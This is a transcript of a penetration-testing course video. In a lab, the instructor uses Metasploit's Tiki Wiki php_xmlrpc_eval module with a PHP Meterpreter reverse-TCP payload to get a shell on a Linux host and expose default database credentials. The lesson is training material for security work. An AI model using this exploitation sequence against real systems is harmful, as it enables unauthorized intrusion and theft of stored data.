Exploitation (part 4) Open Source Vulnerability

Video Activity

This lesson covers using Metasploit to discover an open source vulnerability. Participants learn how to discover information in a database via the vulnerabilities.


Time: 14 hours 26 minutes
Difficulty: Advanced
CEU/CPE: 15

Video Transcription
00:04
or it. Another thing we saw
00:07
was that we have a Tiki Wiki
00:12
program running on
00:15
Linux system.
00:20
Thought Tiki.
00:21
Wiki. We saw her out.
00:25
This one had a Metasploit module, when we looked at the open source vulnerability database. We kind of neglected our Metasploit for it.
00:35
Well, it's in Metasploit. So
00:37
do a search for Tiki Wiki.
00:43
Looks like we actually have a few Tiki Wiki ones.
00:47
Uh, we do info on one of these, about to be an exploit. So
00:55
let's do the first exploit, so info on exploit
01:00
unix/webapp/php_xmlrpc_eval. So remember, we were in our open source vulnerability database
01:15
on 17793. What was our open source vulnerability database before? We should have taken better notes.
01:25
We'll see if it's in our URL history.
01:29
looks like 44 78
01:32
It's in our URL history,
01:34
and that's of course.
01:44
It was 44 78.
01:49
Well, that takes me there.
01:53
Brooks would d b.
01:59
But if we went back to our Nikto output, we would see that 44 78 is the right
02:05
one.
02:06
You sure?
02:08
Really be.
02:20
Yeah. So this is our
02:22
tikiwiki graph formula, or actually the one we chose is not correct. We actually want
02:31
probably this one, right?
02:34
Looks right by the name
02:36
doing info on this one.
02:40
44 78 So that is indeed the correct one. So we would have to
02:46
verify this based on our open source vulnerability database number or our CVE number.
02:53
Seeing as, in this case, there is more than one, and we certainly don't want to send off the wrong one.
02:59
So use that one,
03:01
exploit, we'll show options.
03:05
We don't need to set any proxies here or the VHOST. URI, right? It's /tikiwiki, which is correct in our case. Our port is also correct, 80. It looks like our host is the only thing we need to change.
03:19
Set our host IP address, a love letter
03:24
80 in my case
03:28
and show payloads.
03:34
And, since this is PHP based, we'll actually end up with our PHP payload here as well.
03:40
set payload
03:44
php/
03:46
meterpreter/
03:47
reverse_tcp, or one of the other ones. We should know our options,
03:54
using it before
04:00
exploit
04:04
This one actually gets database information as well. We don't see the database listening on a port here.
04:11
What we do get is information about the backend database. It is listening on localhost, and has the default credentials here: Tiki and Tiki Password.
04:19
So it might be worth, once we get on that box, taking a look at it locally to see if there's any interesting information in there. Again, there's not; we haven't added anything, but you never know. I mean, I've had clients who store a lot of sensitive data in their wiki. I have actually worked for people who do the same thing, actually keep a lot of the
04:39
customer data in a wiki. You
04:43
do their reporting, sharing, things like that.
04:46
It may be worth taking a look at a corporate wiki, particularly one that requires login,
04:54
a fairly common way of sharing data. But we do get another session,
04:59
this time on Linux,
05:02
Meterpreter again, PHP based,
05:08
and we are this time actually an unprivileged user.
05:13
The better way to do web servers is like this, to give web servers unprivileged access. My perception is IIS does the same thing; your IUSR is about as unprivileged as you can get. We saw that our XAMPP web server is actually running as a system service, which is a big no-no security wise. But unfortunately, that's
05:32
generally how our Apache Friends type web servers install on Windows. You either start them manually as an administrative user each time or install them as a system service, and then they run as SYSTEM, just
05:46
unfortunate. But
05:48
you know, that happens, functionality over security, right?
05:53
So Metasploit made it pretty easy on our last few. Is
05:57
on these manually, and you could certainly, like, figure out what the vulnerability is in the PHP code and
06:03
figure out how to create this manually. We'll look at using public exploit code when we get into
06:11
our post exploitation and look at privilege escalation.
06:15
So we will see
06:16
some options of doing this a little bit more manually.
06:20
What
06:21
it was a good one to use Metasploit for, for